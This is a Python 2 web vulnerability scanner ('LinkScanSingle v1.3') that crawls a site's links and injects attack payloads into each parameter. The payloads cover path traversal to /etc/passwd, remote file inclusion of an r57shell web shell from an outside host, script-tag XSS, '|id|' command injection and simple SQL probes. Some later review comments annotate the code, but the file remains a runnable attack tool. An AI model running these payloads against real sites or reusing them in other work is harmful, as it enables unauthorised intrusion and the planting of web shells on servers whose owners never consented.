#!/usr/bin/python
#LinkScanSingle takes a site and collects the
#links found in its page source. For every link that
#contains a "=" it checks for LFI, XSS, RFI, SQL and CMD injection
#by searching the response source (simple string match).

#If you're going to use a different shell than the
#one I have supplied, you will need to change line 
#54 (r57shell) to something in your shell source.

from sgmllib import SGMLParser
import sys, urllib, httplib, re, urllib2, sets, socket

# Default timeout, in seconds, for sockets created from here on, so a
# request that gets no answer does not block indefinitely.
socket.setdefaulttimeout(5)

class URLLister(SGMLParser):
	def reset(self):
		SGMLParser.reset(self)
		self.urls = []

	def start_a(self, attrs):
		href = [v for k, v in attrs if k=='href']
		if href:
			self.urls.extend(href)

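def parse_urls(links):
	"""Turn collected hrefs into the unique list of "...=" URLs to check.

	Every link containing "=" yields one candidate per "=": the link cut
	right after that "=", so each parameter gets a URL ending in "=".
	Links starting with "/" or "?", and other relative links, are prefixed
	with the module-level ``site``.

	An absolute http(s) link is kept only when its host is exactly the host
	of ``site``; links to any other host, sub-domains included, are skipped.
	The earlier test, ``url.find(site.split(".",1)[1])``, was a substring
	match on everything after the first "." of ``site``: it let through URLs
	on other hosts that merely contained that text (for example inside a
	query value), and it raised IndexError when ``site`` had no "." in it.

	Returns a list without duplicates; its order is not defined.
	"""
	def host_of(url):
		# Authority part of *url*, without the scheme and without userinfo.
		rest = url.split("://", 1)[-1]
		for sep in "/?#":
			rest = rest.split(sep, 1)[0]
		return rest.rsplit("@", 1)[-1]

	site_host = host_of(site)
	found = set()
	for link in links:
		# cut = 1 drops the last value, cut = 2 the last two, and so on.
		for cut in range(1, link.count("=") + 1):
			prefix = link.rsplit("=", cut)[0] + "="
			if link[0] in ("/", "?"):
				url = site + prefix
			elif prefix.startswith(("http://", "https://")):
				if host_of(prefix) != site_host:
					# Different host: not part of the site being scanned.
					continue
				url = prefix
			else:
				url = site + prefix
			if url.count("//") > 1:
				# Collapse the first doubled slash found after the
				# 7-character "http://" prefix (the slicing assumes that prefix).
				url = "http://" + url[7:].replace("//", "/", 1)
			found.add(url)
	return list(found)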
			 
def main(host):
	"""Run every check against *host*, one after another.

	The order is XSS, LFI, RFI, CMD, SQL. A urllib2.HTTPError or
	urllib2.URLError raised by one check is swallowed without any output so
	the remaining checks still run; any other exception propagates to the
	caller. The "[+] Checking ..." lines are printed only when the
	module-level ``verbose`` is 1.
	"""
	print "\n\t[+] Testing:",host,"\n"
	# (verbose banner, check function) pairs, in execution order.
	checks = (
		("[+] Checking XSS", xss),
		("[+] Checking LFI", lfi),
		("[+] Checking RFI", rfi),
		("[+] Checking CMD", cmd),
		("[+] Checking SQL", sql),
	)
	for banner, check in checks:
		try:
			if verbose == 1:
				print banner
			check(host)
		except (urllib2.HTTPError, urllib2.URLError):
			# The request for this check failed; go on with the next one.
			continue
 
def rfi(host):
	"""Request host+RFI and report when "r57shell" appears in the response.

	Prints a "[+] RFI:" line with the requested URL on a match, and
	"[-] Not Vuln." otherwise when the module-level ``verbose`` is 1.
	Errors from the request are not handled here (the original
	``except ()`` clause matched no exception type), so they reach the caller.
	"""
	body = urllib2.urlopen(host+RFI).read()
	if "r57shell" in body:
		print "[+] RFI:",host+RFI
	elif verbose == 1:
		print "[-] Not Vuln."
 
def xss(host):
	"""Request host+XSS and report when "XSS" appears in the response.

	Prints a "[!] XSS:" line with the requested URL on a match, and
	"[-] Not Vuln." otherwise when the module-level ``verbose`` is 1.
	"""
	# NOTE(review): the test is a plain substring match on "XSS", so a page
	# that contains those letters for any other reason is reported as well;
	# a hit is an indication to verify, not a confirmation.
	body = urllib2.urlopen(host+XSS).read()
	if "XSS" in body:
		print "[!] XSS:",host+XSS
	elif verbose == 1:
		print "[-] Not Vuln."
		
def sql(host):
	"""Request host+value for each entry of SQL and report "Warning:" responses.

	For every entry a "[!] SQL:" line with the requested URL is printed when
	the response contains "Warning:"; otherwise "[-] Not Vuln." is printed
	when the module-level ``verbose`` is 1.
	"""
	# NOTE(review): "Warning:" is presumably meant to catch database error
	# output, but any page containing that word matches - confirm hits by hand.
	for value in SQL:
		target = host+value
		body = urllib2.urlopen(target).read()
		if "Warning:" in body:
			print "[!] SQL:",target
		elif verbose == 1:
			print "[-] Not Vuln."
		
def cmd(host):
	"""Request host+CMD and report when "uid=" appears in the response.

	Prints a "[!] CMD:" line with the requested URL on a match, and
	"[-] Not Vuln." otherwise when the module-level ``verbose`` is 1.
	"""
	target = host+CMD
	body = urllib2.urlopen(target).read()
	if "uid=" in body:
		print "[!] CMD:",target
	elif verbose == 1:
		print "[-] Not Vuln."
 
def lfi(host):
	"""Request host+LFI, then host+LFI+"%00", and report "root:" responses.

	Each request prints a "[!] LFI:" line with the requested URL when the
	response contains "root:"; otherwise, when the module-level ``verbose``
	is 1, the "not vulnerable" message for that request is printed. The
	second request is made whatever the outcome of the first.
	"""
	# (suffix added after LFI, message printed on a miss in verbose mode)
	attempts = (
		("", "[-] Not Vuln."),
		("%00", "[-] Not Vuln. w/  Null Byte"),
	)
	for suffix, miss in attempts:
		target = host+LFI+suffix
		body = urllib2.urlopen(target).read()
		if "root:" in body:
			print "[!] LFI:",target
		elif verbose == 1:
			print miss
		
# Banner, printed on every run before the arguments are looked at.
print "\n\t   d3hydr8[at]gmail[dot]com LinkScanSingle v1.3"
print "\t-------------------------------------------------\n"

# Accept <site> alone or <site> plus one option; anything else gets the usage text.
if not 2 <= len(sys.argv) <= 3:
	usage = (
		"Usage : ./linkscan.py <site> [option]",
		"Ex: ./linkscan.py www.google.com -verbose",
		"\n\t[Option]",
		"\t\t-verbose/-v | Verbose Output\n",
	)
	for usage_line in usage:
		print usage_line
	sys.exit(1)
	
# Suffixes that the check functions append to each collected "...=" URL.

# Path-traversal string used by lfi(), which looks for "root:" in the response.
LFI = "../../../../../../../../../../../../etc/passwd" 
# URL appended by rfi(), which looks for "r57shell" in the response.
# NOTE(review): a server affected by this check loads a file from this
# third-party host, so what gets loaded is outside the script's control.
RFI = "http://yozurino.com/r.txt?" 
# Not referenced anywhere else in this listing.
RFI_TITLE = "Target" 
# URL-encoded script tag used by xss(), which looks for "XSS" in the response.
XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" 
# Suffix used by cmd(), which looks for "uid=" in the response.
CMD = "|id|"
# Values tried one by one by sql(), which looks for "Warning:" in the response.
SQL = ["-1","999999"] #Add more or change sql payloads
	
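# Target as given on the command line, with any newline removed.
site = sys.argv[1].replace("\n","")
print "\n[+] Collecting:",site
# Bind ``verbose`` on every path. Previously a second argument other than
# -v/-verbose left it undefined, and the first check then raised NameError.
verbose = 0
if len(sys.argv) > 2 and sys.argv[2].lower() in ("-v", "-verbose"):
	verbose = 1
	print "[+] Verbose Mode On\n"
else:
	print "[-] Verbose Mode Off\n"
# Normalise to "http://<host>[/dir]/": drop a leading scheme, discard whatever
# follows the last "/", lower-case the result.
site = site.replace("http://","").rsplit("/",1)[0]+"/"
site = "http://"+site.lower()
try:
	usock = urllib.urlopen(site)
	try:
		parser = URLLister()
		# NOTE(review): the whole page is lower-cased before parsing, so the
		# collected links lose their original case.
		parser.feed(usock.read().lower())
		parser.close()
	finally:
		# Close the connection even when reading or parsing fails.
		usock.close()
except(IOError, urllib2.URLError), msg: 
	print "[-] Error Connecting to",site
	print "[-]",msg
	sys.exit(1)
urls = parse_urls(parser.urls)
print "[+] Links Found:",len(urls)
for url in urls: 
	try:
		main(url)
	except(KeyboardInterrupt):
		# Ctrl-C abandons the current URL only; the loop goes on with the next.
		pass
print "\n[-] Done\n"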
